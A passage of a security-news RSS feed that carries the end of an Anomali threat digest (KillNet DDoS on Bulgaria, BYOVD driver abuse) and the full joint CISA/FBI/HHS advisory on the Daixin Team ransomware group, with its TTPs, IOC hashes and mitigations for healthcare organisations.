Credentials from Password Stores - T1555</a> | <a href="https://ui.threatstream.com/ttp/947079" target="_blank">[MITRE ATT&amp;CK] Screen Capture - T1113</a> | <a href="https://ui.threatstream.com/ttp/947118" target="_blank">[MITRE ATT&amp;CK] Clipboard Data - T1115</a><br><b>Tags:</b> actor:DiceyF, mitre-software:PlugX, detection:GamePlayerFramework, detection:PuppetLoader, Mango messenger, RasMan, Operation Earth Berberoka, Operation DRBControl, APT, Cyberespionage, China, source-country:CN, target-region:Southeast Asia, target-region:Hong Kong, target-industry:Gambling NAICS 713</p>
</div>

<div class="trending-threat-article">
<h3><a href="https://www.rferl.org/a/bulgaria-cyberattack-russia/32084869.html" target="_blank">Bulgarian Government Hit By Cyberattack Blamed On Russian Hacking Group</a></h3>

<p>(published: October 15, 2022)</p>

<p>On October 15, 2022, the Russia-based hacktivist group KillNet performed a distributed denial of service (DDoS) attack disabling Bulgarian government websites belonging to the Constitutional Court, the Defense Ministry, the Interior Ministry, the Justice Ministry, and the President’s Office. KillNet is known for its low-sophistication DDoS attacks that are still able to cause some temporary interruptions for targeted web resources.<br><b>Analyst Comment:</b> KillNet’s Telegram channel announced that their founder (known as KillMilk) is responsible for the attack on the Bulgarian government. Bulgaria attributed this attack specifically to the Russian city of Magnitogorsk. Organizations should implement DDoS protection measures and put in place a business continuity plan in the unfortunate case that your company is the target of a significant DDoS attack. Anomali platform allows for access to updated actor profiles including the KillNet profile listed below.<br><b>MITRE ATT&amp;CK:</b> <a href="https://ui.threatstream.com/ttp/2402530" target="_blank">[MITRE ATT&amp;CK] Network Denial of Service - T1498</a><br><b>Tags:</b> actor:KillNet, target-sector:Government NAICS 92, Bulgaria, target-country:BG, Russia, source-country:RU, DDoS, Hacktivism</p>
</div>

<div class="trending-threat-article">
<h3><a href="https://arstechnica.com/information-technology/2022/10/how-a-microsoft-blunder-opened-millions-of-pcs-to-potent-malware-attacks/" target="_blank">How a Microsoft Blunder Opened Millions of PCs to Potent Malware Attacks</a></h3>

<p>(published: October 14, 2022)</p>

<p>An error in Windows security mechanisms provided for in-the-wild exploitation through bring-your-own-vulnerable-driver (BYOVD) attacks. Microsoft admitted a problem in synchronization, which resulted in the driver blocklist not updated since 2019. In 2021-22 several threat groups abused this issue. North Korea-sponsored Lazarus group used a decommissioned Dell driver with a high-severity vulnerability to target aerospace and media. In March-June 2022, the AvosLocker ransomware abused the vulnerable Avast anti-rootkit driver, BlackByte ransomware exploited a vulnerable driver for Micro-Star’s MSI AfterBurner 4.6.2.15658, and yet another ransomware group used a deprecated anti-cheat driver used by the Genshin Impact game.<br><b>Analyst Comment:</b> Consider monitoring for the presence or loading (for example, Sysmon Event ID 6) of known vulnerable drivers that actors may drop and exploit to execute code in kernel mode. Implement the latest Windows updates for one-time synchronization of the driver blocklist and future solutions for this vulnerability.<br><b>MITRE ATT&amp;CK:</b> <a href="https://ui.threatstream.com/ttp/947233" target="_blank">[MITRE ATT&amp;CK] Exploitation for Privilege Escalation - T1068</a><br><b>Tags:</b> BYOVD, Vulnerable driver, mitre-group:Lazarus Group, detection:AvosLocker, detection:BlackByte, malware-type:Ransomware, Blocklist, Microsoft, Windows</p>
</div>

<h2>Observed Threats</h2>

<p>Additional information regarding the threats discussed in this week's Anomali Cyber Watch can be found below:</p>

<p><a href="https://ui.threatstream.com/actor/232781" target="_blank">KillNet</a><br>
KillNet, a Russia-affiliated hacktivist group specialized in distributed denial of service (DDoS) attacks, originally created on the basis of a Russian-speaking DDoS-for-hire group with the same name. Since February 2022, KillNet formed a loosely affiliated group of volunteer hacktivists to DDoS various organizations in Ukraine and countries that support Ukraine in a way hostile to Russia. KillNet relies on a large following on the Telegram messenger (over 90,000 subscribers) for coordination, growing support, and fundraising. The group aspires to grow beyond just DDoS attacks to include data leaks, credit card fraud monetization services, and substantial support to Russian active-duty military personnel.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AA22-294A: #StopRansomware: Daixin Team]]></title>
<description><![CDATA[Original release date: October 21, 2022SummaryActions to take today to mitigate cyber threats from ransomware:
• Install updates for operating systems, software, and firmware as soon as they are released.
• Require phishing-resistant MFA for as many services as possible.
• Train users to recogniz...]]></description>
<link>https://tsecurity.de/de/1671584/sicherheitsluecken/aa22-294a-stopransomware-daixin-team/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1671584/sicherheitsluecken/aa22-294a-stopransomware-daixin-team/</guid>
<pubDate>Fri, 21 Oct 2022 21:34:44 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Original release date: October 21, 2022<br><h3>Summary</h3><p class="tip-intro"><b>Actions to take today to mitigate cyber threats from ransomware:</b><br><br>
• Install updates for operating systems, software, and firmware as soon as they are released.<br>
• Require phishing-resistant MFA for as many services as possible.<br>
• Train users to recognize and report phishing attempts.</p>

<p><em><strong>Note: </strong>This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These <a href="https://cisa.gov/stopransomware/stopransomware">#StopRansomware</a> advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit <a href="https://cisa.gov/stopransomware">stopransomware.gov</a> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p>

<p>The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Department of Health and Human Services (HHS) are releasing this joint CSA to provide information on the “Daixin Team,” a cybercrime group that is actively targeting U.S. businesses, predominantly in the Healthcare and Public Health (HPH) Sector, with ransomware and data extortion operations.</p>

<p>This joint CSA provides TTPs and IOCs of Daixin actors obtained from FBI threat response activities and third-party reporting.</p>

<p>Download the PDF version of this report: <a href="https://us-cert.cisa.gov/sites/default/files/publications/aa22-294a-stopransomware-daixin-team.pdf">pdf, 591 KB</a></p>
<h3>Technical Details</h3><p><em>Note: This advisory uses the MITRE ATT&amp;CK® for Enterprise framework, version 11. See <a href="https://attack.mitre.org/versions/v11/matrices/enterprise/">MITRE ATT&amp;CK for Enterprise</a> for all referenced tactics and techniques.</em></p>

<p>Cybercrime actors routinely target HPH Sector organizations with ransomware:</p>

<ul><li>As of October 2022, per FBI Internet Crime Complaint Center (IC3) data, specifically victim reports across all 16 critical infrastructure sectors, the HPH Sector accounts for 25 percent of ransomware complaints.</li>
	<li>According to an IC3 annual report in 2021, 649 ransomware reports were made across 14 critical infrastructure sectors; the HPH Sector accounted for the most reports at 148.</li>
</ul><p>The Daixin Team is a ransomware and data extortion group that has targeted the HPH Sector with ransomware and data extortion operations since at least June 2022. Since then, Daixin Team cybercrime actors have caused ransomware incidents at multiple HPH Sector organizations where they have:</p>

<ul><li>Deployed ransomware to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services, and/or</li>
	<li>Exfiltrated personal identifiable information (PII) and patient health information (PHI) and threatened to release the information if a ransom is not paid.</li>
</ul><p>Daixin actors gain initial access to victims through virtual private network (VPN) servers. In one confirmed compromise, the actors likely exploited an unpatched vulnerability in the organization’s VPN server [<a href="https://attack.mitre.org/versions/v11/techniques/T1190/">T1190</a>]. In another confirmed compromise, the actors used previously compromised credentials to access a legacy VPN server [<a href="https://attack.mitre.org/versions/v11/techniques/T1078/">T1078</a>] that did not have multifactor authentication (MFA) enabled. The actors are believed to have acquired the VPN credentials through the use of a phishing email with a malicious attachment [<a href="https://attack.mitre.org/versions/v11/techniques/T1598/002/">T1598.002</a>].</p>

<p>After obtaining access to the victim’s VPN server, Daixin actors move laterally via Secure Shell (SSH) [<a href="https://attack.mitre.org/versions/v11/techniques/T1563/001">T1563.001</a>] and Remote Desktop Protocol (RDP) [<a href="https://attack.mitre.org/versions/v11/techniques/T1563/002">T1563.002</a>]. Daixin actors have sought to gain privileged account access through credential dumping [<a href="https://attack.mitre.org/versions/v11/techniques/T1003/">T1003</a>] and pass the hash [<a href="https://attack.mitre.org/versions/v11/techniques/T1550/002/">T1550.002</a>]. The actors have leveraged privileged accounts to gain access to VMware vCenter Server and reset account passwords [<a href="https://attack.mitre.org/versions/v11/techniques/T1098/">T1098</a>] for ESXi servers in the environment. The actors have then used SSH to connect to accessible ESXi servers and deploy ransomware [<a href="https://attack.mitre.org/versions/v11/techniques/T1486/">T1486</a>] on those servers. </p>

<p>According to third-party reporting, the Daixin Team’s ransomware is based on leaked Babuk Locker source code. This third-party reporting as well as FBI analysis show that the ransomware targets ESXi servers and encrypts files located in <code>/vmfs/volumes/</code> with the following extensions: <code>.vmdk</code>, <code>.vmem</code>, <code>.vswp</code>, <code>.vmsd</code>, <code>.vmx</code>, and <code>.vmsn</code>. A ransom note is also written to <code>/vmfs/volumes/</code>. See Figure 1 for targeted file system path and Figure 2 for targeted file extensions list. <code>Figure 3</code> and <code>Figure 4</code> include examples of ransom notes. Note that in the Figure 3 ransom note, Daixin actors misspell “Daixin” as “Daxin.”</p>
<img alt="" data-align="center" data-entity-type="file" data-entity-uuid="f27be1b8-7608-4dfa-a7c8-a72836daf05d" height="110" src="https://us-cert.cisa.gov/sites/default/files/pictures/AA22-294A%20Picture1.png" width="538"><p class="text-align-center"><em>Figure 1: Daixin Team – Ransomware Targeted File Path</em></p>
<img alt="" data-align="center" data-entity-type="file" data-entity-uuid="ca7614dd-34b9-4bcc-aae1-4255d33ac377" height="391" src="https://us-cert.cisa.gov/sites/default/files/pictures/AA22-294A%20Picture2.png" width="517"><p class="text-align-center"><em>Figure 2: Daixin Team – Ransomware Targeted File Extensions</em></p>
<img alt="" data-align="center" data-entity-type="file" data-entity-uuid="5c494cd6-263f-4a7b-bcb0-a9f2bbb9ef86" height="498" src="https://us-cert.cisa.gov/sites/default/files/pictures/AA22-294A%20Picture3.png" width="811"><p class="text-align-center"><em>Figure 3: Example 1 of Daixin Team Ransomware Note</em></p>
<img alt="" data-align="center" data-entity-type="file" data-entity-uuid="b99fae08-b9a0-431b-9ef9-68e6a96a11b7" height="183" src="https://us-cert.cisa.gov/sites/default/files/pictures/AA22-294A%20Picture4.png" width="478"><p class="text-align-center"><em>Figure 4: Example 2 of Daixin Team Ransomware Note</em></p>

<p>In addition to deploying ransomware, Daixin actors have exfiltrated data [<a href="https://attack.mitre.org/versions/v11/tactics/TA0010/">TA0010</a>] from victim systems. In one confirmed compromise, the actors used Rclone—an open-source program to manage files on cloud storage—to exfiltrate data to a dedicated virtual private server (VPS). In another compromise, the actors used <a href="https://attack.mitre.org/versions/v11/software/S0508/">Ngrok</a>—a reverse proxy tool for proxying an internal service out onto an Ngrok domain—for data exfiltration [<a href="https://attack.mitre.org/versions/v11/techniques/T1567/">T1567</a>].</p>

<h3>MITRE ATT&amp;CK TACTICS AND TECHNIQUES</h3>

<p>See Table 1 for all referenced threat actor tactics and techniques included in this advisory.</p>

<p class="text-align-center"><em>Table 1: Daixin Actors’ ATT&amp;CK Techniques for Enterprise</em></p>

<table align="center" class="Table" width="675"><tbody><tr><td colspan="3" valign="top">
			<p align="center"><span><span><span><span><b>Reconnaissance</b></span></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p align="center"><span><span><span><span><b><span>Technique Title</span></b></span></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><span><b><span>ID</span></b></span></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><span><b><span>Use</span></b></span></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>Phishing for Information: Spearphishing Attachment</span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><a href="https://attack.mitre.org/versions/v11/techniques/T1598/002/">T1598.002</a></span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>Daixin actors have acquired the VPN credentials (later used for initial access) by a phishing email with a malicious attachment.</span></span></span></p>
			</td>
		</tr><tr><td colspan="3" valign="top">
			<p align="center"><span><span><span><b><span>Initial Access</span></b></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p align="center"><span><span><span><span><b><span>Technique Title</span></b></span></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><span><b><span>ID</span></b></span></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><span><b><span>Use</span></b></span></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>Exploit Public-Facing Application</span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><a href="https://attack.mitre.org/versions/v11/techniques/T1190/">T1190</a></span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>Daixin actors exploited an unpatched vulnerability in a VPN server to gain initial access to a network.</span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>Valid Accounts</span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><a href="https://attack.mitre.org/versions/v11/techniques/T1078/">T1078</a></span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>Daixin actors use previously compromised credentials to access servers on the target network.</span></span></span></p>
			</td>
		</tr><tr><td colspan="3" valign="top">
			<p align="center"><span><span><span><b><span>Persistence</span></b></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p align="center"><span><span><span><b><span>Technique Title</span></b></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><b><span>ID</span></b></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><b><span>Use</span></b></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>Account Manipulation</span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><a href="https://attack.mitre.org/versions/v11/techniques/T1098/">T1098</a></span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>Daixin actors have leveraged privileged accounts to reset account passwords for VMware ESXi servers in the compromised environment.</span></span></span></p>
			</td>
		</tr><tr><td colspan="3" valign="top">
			<p align="center"><span><span><span><span><b><span>Credential Access</span></b></span></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p align="center"><span><span><span><span><b><span>Technique Title</span></b></span></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><span><b><span>ID</span></b></span></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><span><b><span>Use</span></b></span></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>OS Credential Dumping</span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><a href="https://attack.mitre.org/versions/v11/techniques/T1003/">T1003</a></span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>Daixin actors have sought to gain privileged account access through credential dumping.</span></span></span></p>
			</td>
		</tr><tr><td colspan="3" valign="top">
			<p align="center"><span><span><span><b><span>Lateral Movement</span></b></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p align="center"><span><span><span><b><span>Technique Title</span></b></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><b><span>ID</span></b></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><b><span>Use</span></b></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>Remote Service Session Hijacking: SSH Hijacking</span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><a href="https://attack.mitre.org/versions/v11/techniques/T1563/001">T1563.001</a></span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>Daixin actors use SSH and RDP to move laterally across a network.</span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>Remote Service Session Hijacking: RDP Hijacking</span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><a href="https://attack.mitre.org/versions/v11/techniques/T1563/002">T1563.002</a></span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>Daixin actors use RDP to move laterally across a network.</span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>Use Alternate Authentication Material: Pass the Hash</span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><a href="https://attack.mitre.org/versions/v11/techniques/T1550/002/">T1550.002</a></span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>Daixin actors have sought to gain privileged account access through pass the hash. </span></span></span></p>
			</td>
		</tr><tr><td colspan="3" valign="top">
			<p align="center"><span><span><span><b><span>Exfiltration</span></b></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p align="center"><span><span><span><span><b><span>Technique Title</span></b></span></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><b><span>ID</span></b></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><b><span>Use</span></b></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>Exfiltration Over Web Service</span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><a href="https://attack.mitre.org/versions/v11/techniques/T1567/">T1567</a></span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>Daixin Team members have used <a href="https://attack.mitre.org/versions/v11/software/S0508/">Ngrok</a> for data exfiltration over web servers.</span></span></span></p>
			</td>
		</tr><tr><td colspan="3" valign="top">
			<p align="center"><span><span><span><b><span>Impact</span></b></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p align="center"><span><span><span><span><b><span>Technique Title</span></b></span></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><b><span>ID</span></b></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><b><span>Use</span></b></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>Data Encrypted for Impact</span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><a href="https://attack.mitre.org/versions/v11/techniques/T1486/">T1486</a></span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>Daixin actors have encrypted data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.</span></span></span></p>
			</td>
		</tr></tbody></table><h3>INDICATORS OF COMPROMISE</h3>

<p>See Table 2 for IOCs obtained from third-party reporting.</p>

<p class="text-align-center"><em>Table 2: Daixin Team IOCs – Rclone Associated SHA256 Hashes</em></p>

<table align="center" class="MsoTableGrid"><tbody><tr><td valign="top">
			<p align="center"><span><span><span><span><b>File</b></span></span></span></span></p>
			</td>
			<td valign="top">
			<p align="center"><span><span><span><b><span>SHA256</span></b></span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>rclone-v1.59.2-windows-amd64\git-log.txt</span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>9E42E07073E03BDEA4CD978D9E7B44A9574972818593306BE1F3DCFDEE722238</span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>rclone-v1.59.2-windows-amd64\rclone.1</span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>19ED36F063221E161D740651E6578D50E0D3CACEE89D27A6EBED4AB4272585BD</span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>rclone-v1.59.2-windows-amd64\rclone.exe</span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>54E3B5A2521A84741DC15810E6FED9D739EB8083CB1FE097CB98B345AF24E939</span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>rclone-v1.59.2-windows-amd64\README.html</span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>EC16E2DE3A55772F5DFAC8BF8F5A365600FAD40A244A574CBAB987515AA40CBF</span></span></span></p>
			</td>
		</tr><tr><td valign="top">
			<p><span><span><span>rclone-v1.59.2-windows-amd64\README.txt</span></span></span></p>
			</td>
			<td valign="top">
			<p><span><span><span>475D6E80CF4EF70926A65DF5551F59E35B71A0E92F0FE4DD28559A9DEBA60C28</span></span></span></p>
			</td>
		</tr></tbody></table><h3>Mitigations</h3><p>FBI, CISA, and HHS urge HPH Sector organizations to implement the following to protect against Daixin and related malicious activity:</p>

<ul><li>Install updates for operating systems, software, and firmware as soon as they are released. Prioritize patching VPN servers, remote access software, virtual machine software, and <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">known exploited vulnerabilities</a>. Consider leveraging a centralized patch management system to automate and expedite the process.</li>
	<li>Require phishing-resistant MFA for as many services as possible—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.</li>
	<li>If you use Remote Desktop Protocol (RDP), secure and monitor it.
	<ul><li>Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources, and require multifactor authentication (MFA) to mitigate credential theft and reuse. If RDP must be available externally, use a virtual private network (VPN), virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.</li>
		<li>Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for business purposes (e.g., RDP Transmission Control Protocol Port 3389).</li>
	</ul></li>
	<li>Turn off SSH and other network device management interfaces such as Telnet, Winbox, and HTTP for wide area networks (WANs) and secure with strong passwords and encryption when enabled.</li>
	<li>Implement and enforce multi-layer network segmentation with the most critical communications and data resting on the most secure and reliable layer.</li>
	<li>Limit access to data by deploying public key infrastructure and digital certificates to authenticate connections with the network, Internet of Things (IoT) medical devices, and the electronic health record system, as well as to ensure data packages are not manipulated while in transit from man-in-the-middle attacks.</li>
	<li>Use standard user accounts on internal systems instead of administrative accounts, which allow for overarching administrative system privileges and do not ensure least privilege.</li>
	<li>Secure PII/PHI at collection points and encrypt the data at rest and in transit by using technologies such as Transport Layer Security (TPS). Only store personal patient data on internal systems that are protected by firewalls, and ensure extensive backups are available if data is ever compromised.</li>
	<li>Protect stored data by masking the permanent account number (PAN) when it is displayed and rendering it unreadable when it is stored—through cryptography, for example.</li>
	<li>Secure the collection, storage, and processing practices for PII and PHI, per regulations such as the Health Insurance Portability and Accountability Act of 1996 (HIPAA). Implementing HIPAA security measures can prevent the introduction of malware on the system.</li>
	<li>Use monitoring tools to observe whether IoT devices are behaving erratically due to a compromise.</li>
	<li>Create and regularly review internal policies that regulate the collection, storage, access, and monitoring of PII/PHI.</li>
	<li>In addition, the FBI, CISA, and HHS urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.</li>
</ul><h3>Preparing for Ransomware</h3>

<ul><li>Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware incident and protect against data losses.
	<ul><li>Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.</li>
	</ul></li>
	<li>Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response procedures for a ransomware incident.
	<ul><li>Organizations should also ensure their incident response and communications plans include response and notification procedures for data breach incidents. Ensure the notification procedures adhere to applicable state laws.
		<ul><li>Refer to applicable state data breach laws and consult legal counsel when necessary.</li>
			<li>For breaches involving electronic health information, you may need to notify the Federal Trade Commission (FTC) or the Department of Health and Human Services, and—in some cases—the media. Refer to the FTC’s <a href="https://www.ftc.gov/legal-library/browse/rules/health-breach-notification-rule">Health Breach Notification</a> Rule and U.S. Department of Health and Human Services’ <a href="https://www.hhs.gov/hipaa/for-professionals/breach-notification/index.html">Breach Notification Rule</a> for more information.</li>
		</ul></li>
		<li>See CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide and CISA Fact Sheet, <a href="https://www.cisa.gov/sites/default/files/publications/CISA_Fact_Sheet-Protecting_Sensitive_and_Personal_Information_from_Ransomware-Caused_Data_Breaches-508C.pdf">Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches</a>, for information on creating a ransomware response checklist and planning and responding to ransomware-caused data breaches.</li>
	</ul></li>
</ul><h3>Mitigating and Preventing Ransomware</h3>

<ul><li>Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.</li>
	<li>Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.</li>
	<li>Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs.</li>
	<li>Open document readers in protected viewing modes to help prevent active content from running.</li>
	<li>Implement user training program and phishing exercises to raise awareness among users about the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments. Reinforce the appropriate user response to phishing and spearphishing emails.</li>
	<li>Use strong passwords and avoid reusing passwords for multiple accounts. See CISA Tip <a href="https://www.cisa.gov/tips/st04-002">Choosing and Protecting Passwords</a> and the National Institute of Standards and Technology’s (NIST’s) <a href="https://csrc.nist.gov/publications/detail/sp/800-63b/final">Special Publication 800-63B: Digital Identity Guidelines</a> for more information.</li>
	<li>Require administrator credentials to install software.</li>
	<li>Audit user accounts with administrative or elevated privileges and configure access controls with least privilege in mind.</li>
	<li>Install and regularly update antivirus and antimalware software on all hosts.</li>
	<li>Only use secure networks and avoid using public Wi-Fi networks. Consider installing and using a VPN.</li>
	<li>Consider adding an email banner to messages coming from outside your organizations.</li>
	<li>Disable hyperlinks in received emails.</li>
</ul><h3>Responding to Ransomware Incidents</h3>

<p>If a ransomware incident occurs at your organization:</p>

<ul><li>Follow your organization’s Ransomware Response Checklist (see Preparing for Ransomware section).</li>
	<li>Scan backups. If possible, scan backup data with an antivirus program to check that it is free of malware. This should be performed using an isolated, trusted system to avoid exposing backups to potential compromise.</li>
	<li>Follow the notification requirements as outlined in your cyber incident response plan.</li>
	<li>Report incidents to the FBI at a <a href="https://www.fbi.gov/contact-us/field-offices">local FBI Field Office</a>, CISA at <a href="https://www.cisa.gov/report">cisa.gov/report</a>, or the U.S. Secret Service (USSS) at a <a href="http://www.secretservice.gov/contact/field-offices/">USSS Field Office</a>.</li>
	<li>Apply incident response best practices found in the joint Cybersecurity Advisory, <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">Technical Approaches to Uncovering and Remediating Malicious Activity</a>, developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.</li>
</ul><p><strong>Note: </strong>FBI, CISA, and HHS strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities.</p>

<h3>REFERENCES</h3>

<ul><li><a href="https://www.stopransomware.gov/">Stopransomware.gov</a> is a whole-of-government approach that gives one central location for ransomware resources and alerts.</li>
	<li>Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) <a href="https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C_.pdf">Joint Ransomware Guide</a>.</li>
	<li>No-cost cyber hygiene services: <a href="https://www.cisa.gov/cyber-hygiene-services">Cyber Hygiene Services</a> and <a href="https://github.com/cisagov/cset/releases/tag/v10.3.0.0">Ransomware Readiness Assessment</a>.</li>
	<li>Ongoing Threat Alerts and Sector alerts are produced by the Health Sector Cybersecurity Coordination Center (HC3) and can be found at <a href="http://hhs.gov/HC3">hhs.gov/HC3</a></li>
	<li>For additional best practices for Healthcare cybersecurity issues see the HHS 405(d) Aligning Health Care Industry Security Approaches at <a href="http://405d.hhs.gov/">405d.hhs.gov</a> </li>
</ul><h3>REPORTING</h3>

<p>The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Daixin Group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Regardless of whether you or your organization have decided to pay the ransom, the FBI, CISA, and HHS urge you to promptly report ransomware incidents to a <a href="https://www.fbi.gov/contact-us/field-offices">local FBI Field Office</a>, or CISA at <a href="https://www.cisa.gov/report">cisa.gov/report</a>.</p>

<h3>ACKNOWLEDGEMENTS</h3>

<p>FBI, CISA, and HHS would like to thank CrowdStrike and the Health Information Sharing and Analysis Center (Health-ISAC) for their contributions to this CSA.</p>

<h3>DISCLAIMER</h3>

<p>The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and HHS do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.</p>
            <h3>Revisions</h3>
		<ul><li>Initial Publication: October 21, 2022</li>		</ul><hr><div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your experience on iOS devices with Linux desktop or laptop]]></title>
<description><![CDATA[Do you think using iOS devices like iPhone or iPad by a Linux user is competent to the case with Android devices? First of all, I personally think current iOS devices are much, much better than its competitors with Android OS if not considering the continuity with desktop/laptop devices in both h...]]></description>
<link>https://tsecurity.de/de/1648892/linux-tipps/your-experience-on-ios-devices-with-linux-desktop-or-laptop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1648892/linux-tipps/your-experience-on-ios-devices-with-linux-desktop-or-laptop/</guid>
<pubDate>Sat, 01 Oct 2022 20:13:13 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
